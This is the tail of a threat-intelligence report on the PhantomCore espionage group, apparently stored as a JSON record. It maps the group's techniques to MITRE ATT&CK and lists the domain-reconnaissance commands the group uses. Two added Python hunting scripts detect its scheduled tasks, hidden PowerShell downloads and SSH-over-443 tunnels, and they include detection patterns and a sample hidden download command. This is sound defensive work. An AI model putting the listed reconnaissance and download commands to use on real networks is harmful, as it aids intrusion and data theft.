server\r\nMITRE ATT\u0026CK matrix\r\nID Name Description\r\nResource Development\r\nT1583.001\r\nAcquire Infrastructure:\r\nDomains\r\nPhantomCore registers phishing domains with fake\r\nCAPTCHAs used to deliver MeshAgent samples,\r\nand domains for the corresponding MeshCentral servers\r\nT1583.003\r\nAcquire Infrastructure:\r\nVirtual Private Server\r\nPhantomCore rents VPS servers (mostly from Russian\r\nhosting providers) and uses them as C2 infrastructure across\r\ndifferent attack stages\r\nT1584.004\r\nCompromise\r\nInfrastructure: Server\r\nPhantomCore gains access to servers of legitimate sites\r\nand later uses them to store samples of MeshAgent,\r\nPhantomTaskShell, and RSocx\r\nT1585.003\r\nEstablish Accounts: Cloud\r\nAccounts\r\nPhantomCore registers Mega.nz cloud accounts and uses\r\nthem to exfiltrate data from compromised networks\r\nT1586.002\r\nCompromise Accounts:\r\nEmail Accounts\r\nPhantomCore gains access to corporate email accounts\r\nat legitimate companies and uses them to distribute\r\nPhantomRAT and PhantomRShell\r\nT1587.001\r\nDevelop Capabilities:\r\nMalware\r\nPhantomCore develops its own malware: PhantomRAT,\r\nPhantomRShell, PhantomTaskShell, PhantomProxyLite,\r\nPhantomStealer, and the Phantom Control Panel\r\nT1588.002 Obtain Capabilities: Tool\r\nPhantomCore buys commercial software XenArmor\r\nAll-In-One Password Recovery Pro and uploads the free\r\nutilities MeshAgent, RSocx, and RClone\r\nT1608.001\r\nStage Capabilities: Upload\r\nMalware\r\nPhantomCore uploads PhantomTaskShell to directories\r\non compromised legitimate sites, and PhantomStealer\r\nto VPS servers\r\nT1608.002\r\nStage Capabilities: Upload\r\nTool\r\nPhantomCore uploads MeshAgent and RSocx to directories\r\non compromised legitimate sites and phishing sites,\r\nand uploads XenArmor All-In-One Password Recovery Pro\r\nand RClone to VPS servers\r\nInitial Access\r\nT1199 Trusted Relationship\r\nPhantomCore sends malicious emails from compromised\r\ncorporate 
mailboxes, impersonating those companies\r\nT1566.001\r\nPhishing: Spearphishing\r\nAttachment\r\nPhantomCore sends phishing emails with PhantomRAT\r\nand PhantomRShell attached\r\nT1566.002\r\nPhishing: Spearphishing\r\nLink\r\nPhantomCore emails links to phishing sites that lead to\r\nMeshAgent being downloaded when visited\r\nExecution\r\nT1204.001\r\nUser Execution: Malicious\r\nLink\r\nPhantomCore lures users of targeted systems into clicking\r\nphishing links to download MeshAgent\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 17 of 22\n\nID Name Description\r\nT1204.002\r\nUser Execution: Malicious\r\nFile\r\nPhantomCore emails PhantomRAT and PhantomRShell\r\nas attachments that recipients open and execute on target\r\nsystems\r\nT1059.001\r\nCommand and Scripting\r\nInterpreter: PowerShell\r\nUsing PhantomRAT, PhantomRShell, PhantomTaskShell,\r\nand the Phantom control panel, PhantomCore runs\r\ncommands in PowerShell on infected hosts\r\nT1059.003\r\nCommand and Scripting\r\nInterpreter: Windows\r\nCommand Shell\r\nUsing PhantomRAT, PhantomRShell, PhantomTaskShell,\r\nand the Phantom control panel, PhantomCore runs\r\ncommands in the Windows cmd.exe interpreter on infected\r\nhosts\r\nPersistence\r\nT1053.005\r\nScheduled Task/Job:\r\nScheduled Task\r\nPhantomCore creates Windows Task Scheduler tasks\r\non infected hosts:\r\nto run SSH tunnels and MeshAgent samples at 09:00–10:00,\r\ndisguising task names as legitimate software updates\r\nand system services: Yandex Update, Microsoft Update,\r\nUpdate, SSH, SSHService, and DNS\r\nto run PhantomTaskShell for 9,999 days regardless of power\r\nsource (AC or battery), disguising the job as an admin\r\nservice named SystemAdminAgent_\u003cGUID\u003e\r\nT1133 External Remote Services\r\nPhantomCore uses external services for remote access: SSH\r\n(tunneling) and 
MeshAgent\r\nDefense Evasion\r\nT1027.002\r\nObfuscated Files\r\nor Information: Software\r\nPacking\r\nPhantomCore uses UPX (the Ultimate Packer\r\nfor eXecutables) to pack PhantomRAT, PhantomRShell,\r\nand lure documents disguised as archives\r\nT1036.004\r\nMasquerading:\r\nMasquerade Task\r\nor Service\r\nPhantomCore disguises Windows Task Scheduler entries\r\nas legitimate software updates and system services: Yandex\r\nUpdate, Microsoft Update, Update, SSH, SSHService, DNS\r\nT1036.005\r\nMasquerading: Match\r\nLegitimate Resource Name\r\nor Location\r\nPhantomCore disguises the names of malware delivered\r\nto victim hosts as legitimate Windows utilities\r\nand components such as ssh.exe, hosts.exe, inetpub.exe,\r\nand srvhost.exe\r\nT1036.007 Masquerading: Double File\r\nExtension\r\nPhantomCore disguises a malicious LNK file as a PDF\r\nby using a double extension\r\nT1036.008 Masquerading:\r\nMasquerade File Type\r\nPhantomCore disguises a malicious LNK as a PDF by\r\nreplacing its icon with a PDF icon\r\nT1070.004\r\nIndicator Removal: File\r\nDeletion\r\nPhantomCore deletes malware and tools after completing an\r\nattack\r\nT1497.001\r\nVirtualization/Sandbox\r\nEvasion: System Checks\r\nPhantomRAT checks for virtualization and analysis tools\r\non the infected host by reading the Windows registry keys\r\nDriverDesc and SYSTEM\\ControlSet001\\Services\\Disk\r\nand looking for the string \"vmware\"\r\nT1564.003\r\nHide Artifacts: Hidden\r\nWindow\r\nPhantomCore launches utilities and malware via PowerShell\r\nwithout showing a window by setting the WindowStyle flag\r\nto Hidden\r\nT1622 Debugger Evasion\r\nPhantomRAT checks for a debugger on the infected host\r\nby calling the WinAPI function IsDebuggerPresent()\r\nCredential Access\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 18 of 22\n\nID Name 
Description\r\nT1555.003\r\nCredentials from Password\r\nStores: Credentials from\r\nWeb Browsers\r\nPhantomCore uses its in‑house infostealer, PhantomStealer,\r\nto export, decrypt, and save as an archive the authentication\r\ndata stored on the infected host in Chrome and Yandex\r\nbrowsers\r\nDiscovery\r\nT1033\r\nSystem Owner/User\r\nDiscovery\r\nPhantomCore gathers information about the owner\r\nand current user of the infected host by running\r\nthe following commands in the Windows command\r\ninterpreter:\r\n— whoami\r\n— quser\r\nT1082\r\nSystem Information\r\nDiscovery\r\nPhantomCore gathers information about the operating\r\nsystem and hardware of the infected host by running\r\nthe following commands in the Windows command\r\ninterpreter:\r\n— systeminfo\r\n— wmic logicaldisk get caption\r\nT1087.001\r\nAccount Discovery: Local\r\nAccount\r\nPhantomCore gathers information about local system\r\naccounts by running the net user command in the Windows\r\ncommand line interpreter.\r\nT1087.002\r\nAccount Discovery:\r\nDomain Account\r\nPhantomCore gathers information about domain accounts\r\nby running the following commands in the Windows\r\ncommand interpreter:\r\n— net user /domain\r\n— \u003credacted\u003e, \u003credacted\u003e, \u003credacted\u003e | ForEach-Object {\r\nnet user $_ /domain }\r\nT1069.002\r\nPermission Groups\r\nDiscovery: Domain Groups\r\nPhantomCore gathers information about domain groups\r\nby running the following commands in the Windows\r\ncommand interpreter:\r\n— net group /domain\r\n— net group \"Domain Admins\" /domain\r\nT1016.001\r\nSystem Network\r\nConfiguration Discovery:\r\nInternet Connection\r\nDiscovery\r\nPhantomCore gathers information about the network\r\nenvironment and the infected host's network configuration\r\nby running the following commands in the Windows\r\ncommand interpreter:\r\n— arp -a\r\n— ipconfig\r\n— route print\r\n— nestat -ano\r\n— nslookup 127.0.0.1\r\n— nslookup \u003credacted\u003e.ru\r\n— ping 
10.64.70.172 -n 1\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nPhantomCore gathers information about the directories\r\nand files on the infected host by running the dir \u003cpath\u003e\r\ncommand in the Windows command interpreter\r\nT1007 System Service Discovery\r\nPhantomCore gathers information about the system services\r\non the infected host by running the get-service command\r\nin the Windows command interpreter\r\nT1057 Process Discovery\r\nPhantomCore gathers information about the system services\r\non the infected host by running the tasklist command\r\nin the Windows command interpreter\r\nT1518.001\r\nSoftware Discovery:\r\nSecurity Software\r\nDiscovery\r\nPhantomCore gathers information about the Windows\r\nDefender configuration of the infected host by running\r\nthe get-mppreference command in the Windows command\r\ninterpreter\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 19 of 22\n\nID Name Description\r\nLateral Movement\r\nT1021.001\r\nRemote Services: Remote\r\nDesktop Protocol\r\nPhantomCore moves laterally across the compromised\r\nnetwork by connecting to other hosts over RDP using\r\naccounts discovered on the initially accessed host\r\nT1021.002\r\nRemote Services:\r\nSMB/Windows Admin\r\nShares\r\nPhantomCore moves laterally across the compromised\r\nnetwork by connecting to other hosts over SMB using\r\naccounts discovered on the initially accessed host\r\nT1021.006\r\nRemote Services: Windows\r\nRemote Management\r\nPhantomCore moves laterally across the compromised\r\nnetwork by connecting to other hosts through Windows\r\nRemote Management (WinRM) using accounts discovered\r\non the initially accessed host\r\nCollection\r\nT1005 Data from Local System\r\nPhantomCore collects files and authentication data stored\r\nin local repositories and databases of infected hosts\r\nT1119 Automated 
Collection\r\nPhantomCore automates collection of files\r\nand authentication data stored in local repositories\r\nand databases of infected hosts using PhantomStealer,\r\nXenArmor All‑In‑One Password Recovery, and Rclone\r\nT1560.001\r\nArchive Collected Data:\r\nArchive via Utility\r\nPhantomCore archives the authentication data and files\r\nfound in local repositories and databases of infected hosts\r\nusing PhantomStealer and Rclone\r\nCommand and Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nPhantomCore uses application‑layer protocols (HTTP,\r\nHTTPS, SSH) to establish network communications\r\nbetween infected hosts and its C2 infrastructure\r\nT1090.002 Proxy: External Proxy\r\nPhantomCore uses external proxy servers to tunnel traffic\r\nfrom infected hosts, leveraging the open‑source tools\r\nOpenSSH and RSocx, as well as its custom utility\r\nPhantomProxyLite\r\nT1104 Multi-Stage Channels\r\nPhantomCore operates a multitier C2 infrastructure\r\nsegmented by attack stage\r\nT1105 Ingress Tool Transfer\r\nPhantomCore uses Windows utilities msiexec and certutil\r\nand PowerShell Invoke‑WebRequest to download malware\r\nand tools from external sources: their own VPS hubs,\r\nGitHub, and compromised legitimate sites\r\nT1219 Remote Access Tools\r\nPhantomCore uses MeshAgent along with its in-house RAT\r\nutilities PhantomRAT and PhantomRShell\r\nT1571 Non-Standard Port\r\nPhantomCore uses nonstandard network ports\r\non C2 servers:\r\nports 80 and 443: OpenSSH service\r\nport 81: fake sites\r\nports 8000 and 8080: utility downloads\r\nT1572 Protocol Tunneling\r\nPhantomCore makes traffic between infected hosts\r\nand C2 look like legitimate HTTPS connections\r\nby tunneling it over SSH to the C2 server's remote port 443\r\nT1573.002\r\nEncrypted Channel:\r\nAsymmetric Cryptography\r\nPhantomCore uses HTTPS and SSH as its C2 
channels\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 20 of 22\n\nID Name Description\r\nT1665 Hide Infrastructure\r\nPhantomCore hides C2 infrastructure by using DynDNS\r\nservices (Cloudflare), impersonating legitimate web\r\nservices (Mattermost, Nextcloud) and IT‑company sites,\r\ncamouflaging malicious traffic as legitimate HTTPS\r\nconnections via SSH tunneling to the C2's remote port 443\r\nExfiltration\r\nT1567.002\r\nExfiltration Over Web\r\nService: Exfiltration\r\nto Cloud Storage\r\nPhantomCore uses Mega.nz cloud storage to exfiltrate data\r\ncollected on the infected host\r\nT1048.003\r\nExfiltration Over\r\nAlternative Protocol:\r\nExfiltration Over\r\nUnencrypted Non-C2\r\nProtocol\r\nPhantomCore uses unencrypted HTTP connections\r\nand the curl utility to download TXT files with information\r\nabout infected hosts to an external VDS server\r\nPT Sandbox\r\nYARA-правила\r\nVerdicts\r\napt_multi_UA_PhantomCore__Backdoor__PhantomRat__2025__Version\r\napt_mem_UA_PhantomCore__Backdoor__PhantomRShell\r\napt_win_UA_PhantomCore__Backdoor__PhantomRShell2\r\napt_win_UA_PhantomCore__Backdoor__PhantomTaskShell\r\napt_win_UA_PhantomCore__Backdoor__PhantomProxyLite__SocksProxyService\r\napt_win_UA_PhantomCore__Trojan__PhantomStealer\r\ntool_mem_ZZ_Rsocx__Proxy\r\ntool_win_ZZ_MalLNK__Trojan__Generic__Cmd,\r\ntool_win_ZZ_MalLNK__Trojan__PowershellHidden\r\nBehavioral verdicts\r\nVerdicts\r\nTrojan.Win32.Recon.c\r\nTrojan.Win32.Generic.a\r\nTrojan-Downloader.Win32.PhantomRShell.n\r\nPT NAD and PT NGFW\r\nVerdicts\r\nREMOTE [PTsecurity] PhantomRAT C2 Checkin (APT PhantomCore) sid: 10013871\r\nREMOTE [PTsecurity] PhantomRAT (APT PhantomCore) sid: 10011867, 10011947\r\nREMOTE [PTsecurity] PhantomRShell Checkin (APT PhantomCore) sid: 10013750, 10014206\r\nREMOTE [PTsecurity] PhantomRShell Get Command (APT PhantomCore) sid: 
10013886\r\nREMOTE [PTsecurity] StatRAT Checkin (APT PhantomCore) sid: 10014175\r\nLOADER [PTsecurity] PhantomDL (APT PhantomCore) sid: 10011868\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 21 of 22\n\nSource: https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-t\r\nhe-apt-group-phantomcore/\r\nhttps://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/\r\nPage 22 of 22",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://global.ptsecurity.com/en/research/pt-esc-threat-intelligence/phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore/"
	],
	"report_names": [
		"phantom-pains-a-large-scale-cyber-espionage-campaign-and-a-possible-split-of-the-apt-group-phantomcore"
	],
	"threat_actors": [],
	"ts_created_at": 1775791262,
	"ts_updated_at": 1775791339,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/caee5f1ec4aeac2d66389622cccc85bb0aabefe3.pdf",
		"text": "https://archive.orkl.eu/caee5f1ec4aeac2d66389622cccc85bb0aabefe3.txt",
		"img": "https://archive.orkl.eu/caee5f1ec4aeac2d66389622cccc85bb0aabefe3.jpg"
	}
}
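The Persistence, Defense Evasion, Discovery and Ingress Tool Transfer rows of the ATT&CK mapping in the report above describe host behaviour that a SOC can hunt for directly: lure-named scheduled tasks with a 9,999-day repetition, payloads dropped under names like ssh.exe or srvhost.exe outside their legitimate locations, PowerShell started with WindowStyle Hidden, certutil/msiexec/Invoke-WebRequest downloads, and a burst of whoami/net user/net group/tasklist commands from one parent. The script below is an added example written for this page, not Positive Technologies' code or tooling. The event field names, the legitimate-path list for ssh.exe, the GUID format assumed for SystemAdminAgent_<GUID>, and every sample record are constructed assumptions to be mapped onto your own Sysmon event 1 / Security event 4698 schema.

```python
"""Hunting logic for the persistence, masquerading, download and discovery rows of the
ATT&CK mapping above. Added example, not Positive Technologies' code: field names and
all sample records are constructed; map them onto your Sysmon 1 / Security 4698 schema."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# T1036.004: task names the report lists as lures, plus SystemAdminAgent_<GUID>
# (hyphenated, optionally braced GUID format is an assumption).
LURE_TASK_NAMES = {"yandex update", "microsoft update", "update", "ssh", "sshservice", "dns"}
ADMIN_AGENT_RE = re.compile(r"^SystemAdminAgent_\{?[0-9a-f-]{36}\}?$", re.I)
# T1036.005: names payloads were dropped under, with the only full paths where a genuine
# copy is expected (assumed OpenSSH / Git for Windows installs); the other three have none.
LEGIT_PATHS = {
    "ssh.exe": {r"c:\windows\system32\openssh\ssh.exe", r"c:\program files\openssh\ssh.exe",
                r"c:\program files\git\usr\bin\ssh.exe"},
    "hosts.exe": set(), "inetpub.exe": set(), "srvhost.exe": set(),
}
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)   # T1564.003: -w / -win / -WindowStyle Hidden
DOWNLOAD_RE = re.compile(                            # T1105: certutil, msiexec, Invoke-WebRequest
    r"certutil(\.exe)?\b.*-urlcache|msiexec(\.exe)?\b.*/i\s+https?://|invoke-webrequest|\biwr\b", re.I)
DISCOVERY_RE = re.compile(                           # commands from the Discovery rows
    r"\b(whoami|quser|systeminfo|wmic logicaldisk|net user|net group|arp -a|ipconfig|"
    r"route print|netstat -ano|nslookup|tasklist|get-service|get-mppreference)\b", re.I)


def task_findings(ev):
    """Check one task-creation record against the T1053.005 / T1036.004 rows."""
    out = []
    name = ev["task_name"].strip("\\")
    if name.lower() in LURE_TASK_NAMES or ADMIN_AGENT_RE.match(name):
        out.append(f"T1036.004 task name masquerade: {name}")
    if ev.get("duration") == "P9999D":   # ISO 8601 repetition duration from the task XML
        out.append(f"T1053.005 task {name} repeats for 9999 days")
    if not ev["command"].lower().startswith((r"c:\windows", r"c:\program files")):
        out.append(f"T1053.005 task {name} runs {ev['command']} from a user-writable path")
    return out


def process_findings(ev):
    """Check one process-creation record for masquerading, hidden windows and downloads."""
    out = []
    image = ev["image"].lower()
    base = image.rsplit("\\", 1)[-1]
    if base in LEGIT_PATHS and image not in LEGIT_PATHS[base]:
        out.append(f"T1036.005 masqueraded binary: {ev['image']}")
    if "powershell" in base and HIDDEN_RE.search(ev["command_line"]):
        out.append("T1564.003 PowerShell started with WindowStyle Hidden")
    if DOWNLOAD_RE.search(ev["command_line"]):
        out.append("T1105 download via LOLBin: " + ev["command_line"][:60])
    return out


def discovery_bursts(events, window=timedelta(minutes=10), threshold=5):
    """Group discovery commands by (host, parent pid); `threshold` distinct commands inside
    `window` is the hands-on-keyboard recon sequence the Discovery rows list."""
    by_parent = defaultdict(list)
    for ev in events:
        m = ev["type"] == "process" and DISCOVERY_RE.search(ev["command_line"])
        if m:
            by_parent[(ev["host"], ev["parent_pid"])].append((ev["ts"], m.group(1).lower()))
    bursts = []
    for key, hits in by_parent.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):
            seen = {cmd for t, cmd in hits[i:] if t - t0 <= window}
            if len(seen) >= threshold:
                bursts.append((key, sorted(seen)))
                break
    return bursts


def hunt(events):
    """Entry point: every finding as (host, message)."""
    findings = []
    for ev in events:
        check = task_findings if ev["type"] == "task" else process_findings
        findings += [(ev["host"], msg) for msg in check(ev)]
    for (host, ppid), cmds in discovery_bursts(events):
        findings.append((host, f"discovery burst under parent pid {ppid}: {', '.join(cmds)}"))
    return findings


T0 = datetime(2025, 6, 1, 9, 0, 0)


def _proc(offset_s, image, cmdline, ppid=4120):
    return {"type": "process", "host": "WS-01", "parent_pid": ppid,
            "ts": T0 + timedelta(seconds=offset_s), "image": image, "command_line": cmdline}


SAMPLE_EVENTS = [  # constructed records, not telemetry from the report
    {"type": "task", "host": "WS-01", "task_name": "\\Yandex Update",
     "command": "C:\\Users\\Public\\ssh.exe", "duration": None},
    {"type": "task", "host": "WS-01", "command": "C:\\ProgramData\\inetpub.exe", "duration": "P9999D",
     "task_name": "\\SystemAdminAgent_3f2b8c1e-5a4d-4f6e-9b1c-0d2e3f4a5b6c"},
    _proc(0, "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
          'powershell.exe -WindowStyle Hidden -c "Invoke-WebRequest http://203.0.113.5:8000/srvhost.exe '
          '-OutFile C:\\Users\\Public\\srvhost.exe"'),
    _proc(20, "C:\\Users\\Public\\srvhost.exe", "srvhost.exe"),
    _proc(60, "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c whoami"),
    _proc(75, "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c systeminfo"),
    _proc(120, "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c net user /domain"),
    _proc(150, "C:\\Windows\\System32\\cmd.exe", 'cmd.exe /c net group "Domain Admins" /domain'),
    _proc(170, "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c tasklist"),
    _proc(3600, "C:\\Windows\\System32\\OpenSSH\\ssh.exe", "ssh.exe -V", ppid=900),   # benign
]
```

Running `hunt(SAMPLE_EVENTS)` yields nine findings for WS-01: both lure tasks, the 9,999-day repetition, the two task binaries in user-writable paths, the hidden PowerShell window and its Invoke-WebRequest download, the srvhost.exe masquerade, and one discovery burst from parent pid 4120; the genuine OpenSSH ssh.exe and the noisy single commands produce nothing. The burst check keys on the parent process rather than the user, because the report's recon is driven through the RAT and task shells, so the commands share a parent even when the interactive session does not.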
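The T1571, T1572 and T1665 rows of the mapping above describe one network-level tell: the group's VPS hosts answer with OpenSSH on ports 80 and 443 so that the SSH tunnel carrying C2 traffic looks like an HTTPS session, while utility downloads are served over plain HTTP on 8000 and 8080. A proxy or NDR sensor that records the first bytes a server sends can flag this port/protocol mismatch without decrypting anything. The check below is an added example written for this page, not Positive Technologies' code; the expected-protocol table, the classifier thresholds, and the connection records are constructed assumptions.

```python
"""Port/protocol mismatch check for the T1571 / T1572 / T1665 rows above: OpenSSH answering
on 80 and 443, plain HTTP on 8000/8080. Added example, not PT's code. It classifies the first
bytes the server sends (from a pcap, Zeek, or a probe of infrastructure you own); the
connection records below are constructed samples."""

# Protocol a defender expects per port; 81/8000/8080 carry HTTP in the report's infrastructure.
EXPECTED = {22: "ssh", 80: "http", 81: "http", 443: "tls", 8000: "http", 8080: "http"}


def classify(server_bytes: bytes) -> str:
    """Identify the server's protocol from its first bytes on the wire."""
    if server_bytes.startswith(b"SSH-"):                       # RFC 4253 identification string
        return "ssh"
    if (len(server_bytes) >= 3 and server_bytes[0] == 0x16
            and server_bytes[1] == 0x03 and server_bytes[2] <= 0x04):
        return "tls"                                           # TLS handshake record, version 3.x
    if server_bytes.startswith(b"HTTP/1."):
        return "http"
    return "unknown"


def mismatches(conns):
    """(dst, port, expected, observed) for each connection whose server speaks something
    other than what the port implies; SSH on 443 is the report's tunnel-as-HTTPS trick."""
    out = []
    for c in conns:
        seen, want = classify(c["server_bytes"]), EXPECTED.get(c["dst_port"])
        if want and seen not in (want, "unknown"):
            out.append((c["dst"], c["dst_port"], want, seen))
    return out


def ssh_on_web_ports(conns):
    """Hosts that answer with an SSH banner on 80 or 443: the C2 VPS profile in the table."""
    return sorted({c["dst"] for c in conns
                   if c["dst_port"] in (80, 443) and classify(c["server_bytes"]) == "ssh"})


SAMPLE_CONNS = [  # constructed samples, not observations from the report
    {"dst": "203.0.113.5", "dst_port": 443, "server_bytes": b"SSH-2.0-OpenSSH_9.6\r\n"},
    {"dst": "203.0.113.5", "dst_port": 80, "server_bytes": b"SSH-2.0-OpenSSH_9.6\r\n"},
    {"dst": "203.0.113.5", "dst_port": 8000, "server_bytes": b"HTTP/1.1 200 OK\r\nServer: SimpleHTTP/0.6\r\n"},
    {"dst": "203.0.113.9", "dst_port": 443, "server_bytes": bytes.fromhex("160303004a020000460303")},
    {"dst": "203.0.113.9", "dst_port": 8080, "server_bytes": b"\x00\x00\x00\x05"},   # unclassified
]
```

`mismatches(SAMPLE_CONNS)` returns the two SSH-on-web-port connections to 203.0.113.5 and nothing for the genuine TLS server or the unclassified stream; `ssh_on_web_ports` reduces that to the host list worth blocking. An SSH tunnel cannot hide its identification string because RFC 4253 requires the server to send it before any key exchange, so this check survives any encryption applied above the SSH layer; it does not, however, see through a TLS wrapper placed in front of SSH, which the report does not describe this group using.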